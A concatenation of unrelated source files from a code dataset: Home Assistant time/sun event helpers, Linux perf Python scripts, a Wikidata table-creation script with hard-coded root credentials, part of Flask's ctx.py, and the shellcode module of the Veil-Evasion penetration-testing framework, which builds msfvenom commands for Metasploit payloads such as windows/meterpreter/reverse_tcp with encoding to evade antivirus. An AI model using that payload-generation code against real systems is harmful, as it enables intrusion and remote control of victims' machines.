    # Compute the absolute UTC deadline, then reuse the point-in-time helper.
    fire_at = dt_util.utcnow() + timedelta(seconds=delay)
    return async_track_point_in_utc_time(hass, action, fire_at)


call_later = threaded_listener_factory(async_call_later)
@callback
@bind_hass
def async_track_time_interval(
    hass: HomeAssistant,
    action: Callable[..., Union[None, Awaitable]],
    interval: timedelta,
) -> CALLBACK_TYPE:
    """Add a listener that fires repetitively at every timedelta interval."""
    remove = None

    def next_interval() -> datetime:
        """Return the next interval."""
        return dt_util.utcnow() + interval

    @callback
    def interval_listener(now: datetime) -> None:
        """Handle elapsed intervals."""
        nonlocal remove
        # Re-arm first so a long-running action cannot delay the next tick.
        remove = async_track_point_in_utc_time(hass, interval_listener, next_interval())
        hass.async_run_job(action, now)

    remove = async_track_point_in_utc_time(hass, interval_listener, next_interval())

    def remove_listener() -> None:
        """Remove interval listener."""
        # Calls whichever one-shot listener is currently armed.
        remove()

    return remove_listener


track_time_interval = threaded_listener_factory(async_track_time_interval)
@attr.s
class SunListener:
    """Helper class to help listen to sun events."""

    hass: HomeAssistant = attr.ib()
    action: Callable[..., None] = attr.ib()
    # Either SUN_EVENT_SUNRISE or SUN_EVENT_SUNSET (see the trackers below).
    event: str = attr.ib()
    offset: Optional[timedelta] = attr.ib()
    _unsub_sun: Optional[CALLBACK_TYPE] = attr.ib(default=None)
    _unsub_config: Optional[CALLBACK_TYPE] = attr.ib(default=None)

    @callback
    def async_attach(self) -> None:
        """Attach a sun listener."""
        assert self._unsub_config is None

        # Re-schedule on core config updates, since a location change moves
        # the sunrise/sunset times.
        self._unsub_config = self.hass.bus.async_listen(
            EVENT_CORE_CONFIG_UPDATE, self._handle_config_event
        )

        self._listen_next_sun_event()

    @callback
    def async_detach(self) -> None:
        """Detach the sun listener."""
        assert self._unsub_sun is not None
        assert self._unsub_config is not None

        self._unsub_sun()
        self._unsub_sun = None
        self._unsub_config()
        self._unsub_config = None

    @callback
    def _listen_next_sun_event(self) -> None:
        """Set up the sun event listener."""
        assert self._unsub_sun is None

        self._unsub_sun = async_track_point_in_utc_time(
            self.hass,
            self._handle_sun_event,
            get_astral_event_next(self.hass, self.event, offset=self.offset),
        )

    @callback
    def _handle_sun_event(self, _now: Any) -> None:
        """Handle solar event."""
        # The one-shot listener fired; re-arm for the next day's event.
        self._unsub_sun = None
        self._listen_next_sun_event()
        self.hass.async_run_job(self.action)

    @callback
    def _handle_config_event(self, _event: Any) -> None:
        """Handle core config update."""
        assert self._unsub_sun is not None
        self._unsub_sun()
        self._unsub_sun = None
        self._listen_next_sun_event()
@callback
@bind_hass
def async_track_sunrise(
    hass: HomeAssistant, action: Callable[..., None], offset: Optional[timedelta] = None
) -> CALLBACK_TYPE:
    """Add a listener that will fire a specified offset from sunrise daily."""
    sun_listener = SunListener(hass, action, SUN_EVENT_SUNRISE, offset)
    sun_listener.async_attach()
    # Detaching the listener is how callers cancel the subscription.
    return sun_listener.async_detach


track_sunrise = threaded_listener_factory(async_track_sunrise)
@callback
@bind_hass
def async_track_sunset(
    hass: HomeAssistant, action: Callable[..., None], offset: Optional[timedelta] = None
) -> CALLBACK_TYPE:
    """Add a listener that will fire a specified offset from sunset daily."""
    sun_listener = SunListener(hass, action, SUN_EVENT_SUNSET, offset)
    sun_listener.async_attach()
    # Detaching the listener is how callers cancel the subscription.
    return sun_listener.async_detach


track_sunset = threaded_listener_factory(async_track_sunset)
# For targeted patching in tests
pattern_utc_now = dt_util.utcnow


@callback
@bind_hass
def async_track_utc_time_change(
    hass: HomeAssistant,
    action: Callable[..., None],
    hour: Optional[Any] = None,
    minute: Optional[Any] = None,
    second: Optional[Any] = None,
    local: bool = False,
) -> CALLBACK_TYPE:
    """Add a listener that will fire if time matches a pattern."""
    # We do not have to wrap the function with time pattern matching logic
    # if no pattern given
    if all(val is None for val in (hour, minute, second)):

        @callback
        def time_change_listener(event: Event) -> None:
            """Fire every time event that comes in."""
            hass.async_run_job(action, event.data[ATTR_NOW])

        return hass.bus.async_listen(EVENT_TIME_CHANGED, time_change_listener)

    matching_seconds = dt_util.parse_time_expression(second, 0, 59)
    matching_minutes = dt_util.parse_time_expression(minute, 0, 59)
    matching_hours = dt_util.parse_time_expression(hour, 0, 23)

    next_time: datetime = dt_util.utcnow()

    def calculate_next(now: datetime) -> None:
        """Calculate and set the next time the trigger should fire."""
        nonlocal next_time

        # With local=True the pattern is matched against local wall-clock
        # time; otherwise against UTC.
        localized_now = dt_util.as_local(now) if local else now
        next_time = dt_util.find_next_time_expression_time(
            localized_now, matching_seconds, matching_minutes, matching_hours
        )

    # Make sure rolling back the clock doesn't prevent the timer from
    # triggering.
    cancel_callback: Optional[asyncio.TimerHandle] = None
    calculate_next(next_time)

    @callback
    def pattern_time_change_listener() -> None:
        """Listen for matching time_changed events."""
        nonlocal next_time, cancel_callback

        now = pattern_utc_now()
        hass.async_run_job(action, dt_util.as_local(now) if local else now)

        # Re-arm for the next occurrence; the +1s skip avoids re-matching
        # the second that just fired.
        calculate_next(now + timedelta(seconds=1))

        cancel_callback = hass.loop.call_at(
            hass.loop.time() + next_time.timestamp() - time.time(),
            pattern_time_change_listener,
        )

    cancel_callback = hass.loop.call_at(
        hass.loop.time() + next_time.timestamp() - time.time(),
        pattern_time_change_listener,
    )

    @callback
    def unsub_pattern_time_change_listener() -> None:
        """Cancel the call_later."""
        nonlocal cancel_callback
        assert cancel_callback is not None
        cancel_callback.cancel()

    return unsub_pattern_time_change_listener


track_utc_time_change = threaded_listener_factory(async_track_utc_time_change)
@callback
@bind_hass
def async_track_time_change(
    hass: HomeAssistant,
    action: Callable[..., None],
    hour: Optional[Any] = None,
    minute: Optional[Any] = None,
    second: Optional[Any] = None,
) -> CALLBACK_TYPE:
    """Add a listener that will fire if local time matches a pattern."""
    # local=True: the pattern is evaluated against *local* wall-clock time
    # (the previous docstring incorrectly said UTC; see the as_local branch
    # in async_track_utc_time_change).
    return async_track_utc_time_change(hass, action, hour, minute, second, local=True)


track_time_change = threaded_listener_factory(async_track_time_change)
def process_state_match(
    parameter: Union[None, str, Iterable[str]]
) -> Callable[[str], bool]:
    """Build a predicate that tests a state string against *parameter*.

    ``None`` or ``MATCH_ALL`` matches everything, a plain string (or any
    non-iterable) matches by equality, and an iterable matches membership.
    """
    if parameter is None or parameter == MATCH_ALL:
        def match_any(_state: str) -> bool:
            return True
        return match_any

    if isinstance(parameter, str) or not hasattr(parameter, "__iter__"):
        def match_single(state: str) -> bool:
            return state == parameter
        return match_single

    allowed = set(parameter)

    def match_member(state: str) -> bool:
        return state in allowed

    return match_member
| mit |
PaoloW8/android_kernel_ZTE_NX505J | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
    """Return an autovivifying dict: missing keys yield nested autodicts."""
    nested = defaultdict(autodict)
    return nested
# Lazily-populated lookup tables, filled in by the define_* callbacks below:
# event_name -> field_name -> {'delim': str, 'values': {int_value: name}}
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
    """Register the delimiter used when printing a flags-type field."""
    flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
    """Map one flag bit *value* of a field to its symbolic name *field_str*."""
    flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
    """Placeholder kept for API symmetry with define_flag_field."""
    # nothing to do, really
    pass
def define_symbolic_value(event_name, field_name, value, field_str):
    """Map one symbolic *value* of a field to its name *field_str*."""
    symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
    """Return a delimiter-joined string naming every flag bit set in *value*.

    Returns "" when no mapping was registered for the field or no bit matches.
    A value of 0 returns the name registered for key 0 (if any).
    """
    string = ""
    if flag_fields[event_name][field_name]:
        print_delim = 0
        # sorted() instead of keys()/.sort(): dict.keys() is a view object in
        # Python 3 with no .sort() method; sorted() works on Python 2 and 3.
        for idx in sorted(flag_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                string += flag_fields[event_name][field_name]['values'][idx]
                break
            if idx and (value & idx) == idx:
                if print_delim and flag_fields[event_name][field_name]['delim']:
                    string += " " + flag_fields[event_name][field_name]['delim'] + " "
                string += flag_fields[event_name][field_name]['values'][idx]
                print_delim = 1
                # clear the bit so leftover bits don't re-match supersets
                value &= ~idx
    return string
def symbol_str(event_name, field_name, value):
    """Return the symbolic name registered for *value*, or "" if unknown."""
    string = ""
    if symbolic_fields[event_name][field_name]:
        # sorted() instead of keys()/.sort(): dict.keys() is a view object in
        # Python 3 with no .sort() method; sorted() works on Python 2 and 3.
        for idx in sorted(symbolic_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
            if (value == idx):
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
    return string
# Kernel trace flag bits -> display names (mirrors ftrace's flag output).
trace_flags = { 0x00: "NONE", \
                0x01: "IRQS_OFF", \
                0x02: "IRQS_NOSUPPORT", \
                0x04: "NEED_RESCHED", \
                0x08: "HARDIRQ", \
                0x10: "SOFTIRQ" }
def trace_flag_str(value):
    """Render *value* as a ' | '-joined list of trace flag names."""
    # A value of zero always maps to the single name registered for bit 0.
    if not value:
        return "NONE"
    names = []
    remaining = value
    for bit in trace_flags:
        if bit and (remaining & bit) == bit:
            names.append(trace_flags[bit])
            remaining &= ~bit
    return " | ".join(names)
def taskState(state):
    """Translate a numeric scheduler task state into its letter code."""
    return {
        0: "R",
        1: "S",
        2: "D",
        64: "DEAD",
    }.get(state, "Unknown")
class EventHeaders:
    """Common header fields shared by every perf trace event."""

    def __init__(self, common_cpu, common_secs, common_nsecs,
                 common_pid, common_comm):
        self.cpu = common_cpu        # CPU the event was recorded on
        self.secs = common_secs      # timestamp: whole seconds
        self.nsecs = common_nsecs    # timestamp: nanosecond remainder
        self.pid = common_pid        # pid of the task
        self.comm = common_comm      # task command name

    def ts(self):
        """Return the full timestamp in nanoseconds."""
        return (self.secs * (10 ** 9)) + self.nsecs

    def ts_format(self):
        """Return the timestamp formatted as 'seconds.microseconds'.

        Bugfix: the microsecond part is zero-padded to six digits.  The old
        "%d.%d" format rendered e.g. nsecs=5000 (5 us) as "1.5" instead of
        "1.000005", silently misreporting the timestamp.
        """
        return "%d.%06d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
codercold/Veil-Evasion | modules/common/shellcode.py | 1 | 21068 | """
Contains main Shellcode class as well as the Completer class used
for tab completion of metasploit payload selection.
"""
# Import Modules
import commands
import socket
import sys
import os
import sys
import re
import readline
import subprocess
import binascii
from modules.common import messages
from modules.common import helpers
from modules.common import completers
import settings
class Shellcode:
"""
Class that represents a shellcode object, custom of msfvenom generated.
"""
    def __init__(self):
        """Initialize empty state and crawl the Metasploit tree once."""
        # the nested dictionary passed to the completer
        self.payloadTree = {}
        # the entire msfvenom command that may be built
        self.msfvenomCommand = ""
        # any associated msfvenom options
        self.msfvenomOptions = list()
        # in case user specifies a custom shellcode string
        self.customshellcode = ""
        # specific msfvenom payload specified
        self.msfvenompayload= ""
        # misc options
        self.options = list()
        # load up all the metasploit modules available
        self.LoadModules()
def Reset(self):
"""
reset the state of any internal variables, everything but self.payloadTree
"""
self.msfvenomCommand = ""
self.msfvenomOptions = list()
self.customshellcode = ""
self.msfvenompayload= ""
self.options = list()
    def LoadModules(self):
        """
        Crawls the metasploit install tree and extracts available payloads
        and their associated required options for languages specified.

        Populates self.payloadTree as a nested dict:
        platform -> [arch ->] stage -> stager -> [required option names],
        plus platform -> [arch ->] single -> [required option names].
        """
        # Variable changed for compatibility with non-root and non-Kali users
        # Thanks to Tim Medin for the patch
        msfFolder = settings.METASPLOIT_PATH
        # I can haz multiple platforms?
        platforms = ["windows"]
        for platform in platforms:
            self.payloadTree[platform] = {}
            # NOTE(review): stagersX86/stagersX64 are assigned but never
            # used anywhere in this method -- confirm they can be dropped.
            stagesX86 = list()
            stagersX86 = list()
            stagesX64 = list()
            stagersX64 = list()
            # load up all the stages (meterpreter/vnc/etc.)
            # TODO: detect Windows and modify the paths appropriately
            for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stages/" + platform + "/"):
                for f in files:
                    stageName = f.split(".")[0]
                    if "x64" in root:
                        stagesX64.append(f.split(".")[0])
                        if "x64" not in self.payloadTree[platform]:
                            self.payloadTree[platform]["x64"] = {}
                        self.payloadTree[platform]["x64"][stageName] = {}
                    elif "x86" in root: # linux payload structure format
                        stagesX86.append(f.split(".")[0])
                        if "x86" not in self.payloadTree[platform]:
                            self.payloadTree[platform]["x86"] = {}
                        self.payloadTree[platform]["x86"][stageName] = {}
                    else: # windows payload structure format
                        stagesX86.append(f.split(".")[0])
                        if stageName not in self.payloadTree[platform]:
                            self.payloadTree[platform][stageName] = {}
            # load up all the stagers (reverse_tcp, bind_tcp, etc.)
            # TODO: detect Windows and modify the paths appropriately
            for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stagers/" + platform + "/"):
                for f in files:
                    if ".rb" in f:
                        extraOptions = list()
                        moduleName = f.split(".")[0]
                        lines = open(root + "/" + f).readlines()
                        # scrape required OptString declarations out of the
                        # stager's ruby source
                        for line in lines:
                            if "OptString" in line.strip() and "true" in line.strip():
                                cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
                                extraOptions.append(cmd)
                        if "bind" in f:
                            if "x64" in root:
                                for stage in stagesX64:
                                    self.payloadTree[platform]["x64"][stage][moduleName] = ["LPORT"] + extraOptions
                            elif "x86" in root:
                                for stage in stagesX86:
                                    self.payloadTree[platform]["x86"][stage][moduleName] = ["LPORT"] + extraOptions
                            else:
                                for stage in stagesX86:
                                    self.payloadTree[platform][stage][moduleName] = ["LPORT"] + extraOptions
                        if "reverse" in f:
                            if "x64" in root:
                                for stage in stagesX64:
                                    self.payloadTree[platform]["x64"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
                            elif "x86" in root:
                                for stage in stagesX86:
                                    self.payloadTree[platform]["x86"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
                            else:
                                for stage in stagesX86:
                                    self.payloadTree[platform][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
            # load up any payload singles
            # TODO: detect Windows and modify the paths appropriately
            for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/singles/" + platform + "/"):
                for f in files:
                    if ".rb" in f:
                        lines = open(root + "/" + f).readlines()
                        totalOptions = list()
                        moduleName = f.split(".")[0]
                        for line in lines:
                            if "OptString" in line.strip() and "true" in line.strip():
                                cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
                                totalOptions.append(cmd)
                        if "bind" in f:
                            totalOptions.append("LPORT")
                        if "reverse" in f:
                            totalOptions.append("LHOST")
                            totalOptions.append("LPORT")
                        if "x64" in root:
                            self.payloadTree[platform]["x64"][moduleName] = totalOptions
                        elif "x86" in root:
                            self.payloadTree[platform]["x86"][moduleName] = totalOptions
                        else:
                            self.payloadTree[platform][moduleName] = totalOptions
    def SetPayload(self, payloadAndOptions):
        """
        Manually set the payload/options, used in scripting

        payloadAndOptions = nested 2 element list of
            [msfvenom_payload, ["option=value", ...]]
            i.e. ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]]
        """
        # extract the msfvenom payload and options
        payload = payloadAndOptions[0]
        options = payloadAndOptions[1]
        # grab any specified msfvenom options in the /etc/veil/settings.py file
        msfvenomOptions = ""
        if hasattr(settings, "MSFVENOM_OPTIONS"):
            msfvenomOptions = settings.MSFVENOM_OPTIONS
        # build the msfvenom command
        # TODO: detect Windows and modify the msfvenom command appropriately
        self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payload
        # add options only if we have some
        if options:
            for option in options:
                self.msfvenomCommand += " " + option + " "
        # NOTE(review): unlike menu(), this scripted path hard-codes the
        # x86/shikata_ga_nai encoder -- confirm the asymmetry is intended.
        self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -e x86/shikata_ga_nai -f c | tr -d \'\"\' | tr -d \'\n\'"
        # set the internal msfvenompayload to this payload
        self.msfvenompayload = payload
        # set the internal msfvenomOptions to these options
        if options:
            for option in options:
                self.msfvenomOptions.append(option)
    def setCustomShellcode(self, customShellcode):
        """
        Manually set self.customshellcode to the shellcode string passed.

        customShellcode = shellcode string ("\\x00\\x01...")
        """
        self.customshellcode = customShellcode
def custShellcodeMenu(self, showTitle=True):
"""
Menu to prompt the user for a custom shellcode string.
Returns None if nothing is specified.
"""
# print out the main title to reset the interface
if showTitle:
messages.title()
print ' [?] Use msfvenom or supply custom shellcode?\n'
print ' 1 - msfvenom (default)'
print ' 2 - custom shellcode string'
print ' 3 - file with shellcode (raw)\n'
choice = raw_input(" [>] Please enter the number of your choice: ")
if choice == '3':
# instantiate our completer object for path completion
comp = completers.PathCompleter()
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# if the shellcode is specicified as a raw file
filePath = raw_input(" [>] Please enter the path to your raw shellcode file: ")
try:
shellcodeFile = open(filePath, 'rb')
CustShell = shellcodeFile.read()
shellcodeFile.close()
except:
print helpers.color(" [!] WARNING: path not found, defaulting to msfvenom!", warning=True)
return None
if len(CustShell) == 0:
print helpers.color(" [!] WARNING: no custom shellcode restrieved, defaulting to msfvenom!", warning=True)
return None
# check if the shellcode was passed in as string-escaped form
if CustShell[0:2] == "\\x" and CustShell[4:6] == "\\x":
return CustShell
else:
# otherwise encode the raw data as a hex string
hexString = binascii.hexlify(CustShell)
CustShell = "\\x"+"\\x".join([hexString[i:i+2] for i in range(0,len(hexString),2)])
return CustShell
# remove the completer
readline.set_completer(None)
if choice == '2':
# if the shellcode is specified as a string
CustomShell = raw_input(" [>] Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
if len(CustomShell) == 0:
print helpers.color(" [!] WARNING: no spellcode specified, defaulting to msfvenom!", warning=True)
return CustomShell
elif choice != '1':
print helpers.color(" [!] WARNING: Invalid option chosen, defaulting to msfvenom!", warning=True)
return None
else:
return None
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# prompt for custom shellcode
customShellcode = self.custShellcodeMenu()
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press [enter] for windows/meterpreter/reverse_tcp'
print ' [*] Press [tab] to list available payloads'
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ')
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
# LPORT validation
else:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'' + option + '\': ')
if option == "LPORT":
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter extra msfvenom options in OPTION=value syntax: ')
if selection != "":
extraValues.append(selection)
else: break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -f c | tr -d \'\"\' | tr -d \'\n\'"
    def generate(self):
        """
        Based on the options set by menu(), setCustomShellcode() or SetPayload()
        either returns the custom shellcode string or calls msfvenom
        and returns the result.

        Returns the shellcode string for this object, or None on error.
        """
        # if the msfvenom command nor shellcode are set, revert to the
        # interactive menu to set any options
        if self.msfvenomCommand == "" and self.customshellcode == "":
            self.menu()
        # return custom specified shellcode if it was set previously
        if self.customshellcode != "":
            return self.customshellcode
        # generate the shellcode using msfvenom
        else:
            print helpers.color("\n [*] Generating shellcode...")
            if self.msfvenomCommand == "":
                print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
                return None
            else:
                # Strip out extra characters, new lines, etc., just leave the shellcode.
                # Tim Medin's patch for non-root non-kali users
                FuncShellcode = subprocess.check_output(settings.METASPLOIT_PATH + self.msfvenomCommand, shell=True)
                # try to get the current MSF build version so we can determine how to
                # parse the shellcode
                # pretty sure it was this commit that changed everything-
                # https://github.com/rapid7/metasploit-framework/commit/4dd60631cbc88e8e6d5322a94a492714ff83fe2f
                try:
                    # get the latest metasploit build version
                    f = open(settings.METASPLOIT_PATH + "/build_rev.txt")
                    lines = f.readlines()
                    f.close()
                    # extract the build version/data
                    version = lines[0]
                    major,date = version.split("-")
                    # 2014021901 - the version build date where msfvenom shellcode changed
                    if int(date) < 2014021901:
                        # use the old way
                        return FuncShellcode[82:-1].strip()
                    else:
                        # new way
                        return FuncShellcode[22:-1].strip()
                # on error, default to the new version
                except:
                    return FuncShellcode[22:-1].strip()
| gpl-3.0 |
wikimedia/mediawiki-extensions-WikidataEntitySuggester | wikiparser/createtables.py | 2 | 1087 | #!/usr/bin/python
"""Creates the DB and tables for wikiparser_db.py to insert into."""
import sys
import MySQLdb as mdb
def main():
    """(Re)create the plabel and label tables in the wikidatawiki database."""
    # NOTE(security review): credentials are hard-coded; consider reading
    # them from a config file or environment instead.
    con = mdb.connect('localhost', 'root', 'password', 'wikidatawiki')
    with con:
        cur = con.cursor()
        try:
            cur.execute("DROP TABLE IF EXISTS plabel")
        except mdb.Warning:
            # BUGFIX: the module is imported as `mdb`; the original caught
            # `MySQLdb.Warning`, which raised NameError whenever the DROP
            # actually produced a warning.
            pass
        cur.execute("CREATE TABLE plabel("
                    "pl_id INT UNSIGNED NOT NULL, "
                    "pl_lang VARCHAR(32) NOT NULL, "
                    "pl_text VARCHAR(256) NOT NULL) "
                    "ENGINE=InnoDB "
                    "CHARSET binary")
        try:
            cur.execute("DROP TABLE IF EXISTS label")
        except mdb.Warning:
            # see BUGFIX note above
            pass
        cur.execute("CREATE TABLE label("
                    "l_id INT UNSIGNED NOT NULL, "
                    "l_lang VARCHAR(32) NOT NULL, "
                    "l_text VARCHAR(256) NOT NULL) "
                    "ENGINE=InnoDB "
                    "CHARSET binary")
        con.commit()
# Run table creation only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| mit |
jeeb/spica-2.6.38 | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
# Per-thread bookkeeping for in-flight futex waits, plus long-lived stats.
# (The original defined process_names twice; the duplicate is removed.)
thread_thislock = {}   # tid -> uaddr of the futex the thread is waiting on
thread_blocktime = {}  # tid -> timestamp (ns) when the thread began waiting
lock_waits = {}  # long-lived stats on (tid,lock) blockage elapsed time
process_names = {}  # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
                              nr, uaddr, op, val, utime, uaddr2, val3):
    """Record the moment a thread starts blocking on a FUTEX_WAIT."""
    cmd = op & FUTEX_CMD_MASK
    if cmd != FUTEX_WAIT:
        return # we don't care about originators of WAKE events
    process_names[tid] = comm
    thread_thislock[tid] = uaddr
    thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
                             nr, ret):
    """On futex syscall return, account the elapsed blocked time (if any)."""
    # `in` instead of dict.has_key(): has_key() was removed in Python 3 and
    # the `in` operator is the idiomatic form on Python 2 as well.
    if tid in thread_blocktime:
        elapsed = nsecs(s, ns) - thread_blocktime[tid]
        add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
        del thread_blocktime[tid]
        del thread_thislock[tid]
def trace_begin():
    # Called once by perf when the script starts.
    print "Press control+C to stop and show the summary"
def trace_end():
    # Called once by perf at exit: dump per-(tid, lock) contention stats.
    for (tid, lock) in lock_waits:
        # NOTE: min/max/avg shadow the builtins, but only within this loop.
        min, max, avg, count = lock_waits[tid, lock]
        print "%s[%d] lock %x contended %d times, %d avg ns" % \
              (process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
chundongwang/Guess2014 | lib/flask/ctx.py | 776 | 14266 | # -*- coding: utf-8 -*-
"""
flask.ctx
~~~~~~~~~
Implements the objects required to keep the context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import sys
from functools import update_wrapper
from werkzeug.exceptions import HTTPException
from .globals import _request_ctx_stack, _app_ctx_stack
from .module import blueprint_is_module
from .signals import appcontext_pushed, appcontext_popped
class _AppCtxGlobals(object):
"""A plain object."""
def get(self, name, default=None):
return self.__dict__.get(name, default)
def __contains__(self, item):
return item in self.__dict__
def __iter__(self):
return iter(self.__dict__)
def __repr__(self):
top = _app_ctx_stack.top
if top is not None:
return '<flask.g of %r>' % top.app.name
return object.__repr__(self)
def after_this_request(f):
    """Executes a function after this request.  This is useful to modify
    response objects.  The function is passed the response object and has
    to return the same or a new one.

    Example::

        @app.route('/')
        def index():
            @after_this_request
            def add_header(response):
                response.headers['X-Foo'] = 'Parachute'
                return response
            return 'Hello World!'

    This is more useful if a function other than the view function wants to
    modify a response.  For instance think of a decorator that wants to add
    some headers without converting the return value into a response object.

    .. versionadded:: 0.9
    """
    # Registered functions run against the response object before the
    # regular after_request handlers; see RequestContext._after_request_functions.
    _request_ctx_stack.top._after_request_functions.append(f)
    return f
def copy_current_request_context(f):
    """A helper function that decorates a function to retain the current
    request context.  This is useful when working with greenlets.  The moment
    the function is decorated a copy of the request context is created and
    then pushed when the function is called.

    Example::

        import gevent
        from flask import copy_current_request_context

        @app.route('/')
        def index():
            @copy_current_request_context
            def do_some_work():
                # do some work here, it can access flask.request like you
                # would otherwise in the view function.
                ...
            gevent.spawn(do_some_work)
            return 'Regular response'

    .. versionadded:: 0.10
    """
    top = _request_ctx_stack.top
    if top is None:
        raise RuntimeError('This decorator can only be used at local scopes '
            'when a request context is on the stack.  For instance within '
            'view functions.')
    # Snapshot the context at decoration time, not call time.
    reqctx = top.copy()
    def wrapper(*args, **kwargs):
        with reqctx:
            return f(*args, **kwargs)
    return update_wrapper(wrapper, f)
def has_request_context():
    """If you have code that wants to test if a request context is there or
    not this function can be used.  For instance, you may want to take advantage
    of request information if the request object is available, but fail
    silently if it is unavailable.

    ::

        class User(db.Model):

            def __init__(self, username, remote_addr=None):
                self.username = username
                if remote_addr is None and has_request_context():
                    remote_addr = request.remote_addr
                self.remote_addr = remote_addr

    Alternatively you can also just test any of the context bound objects
    (such as :class:`request` or :class:`g` for truthness)::

        class User(db.Model):

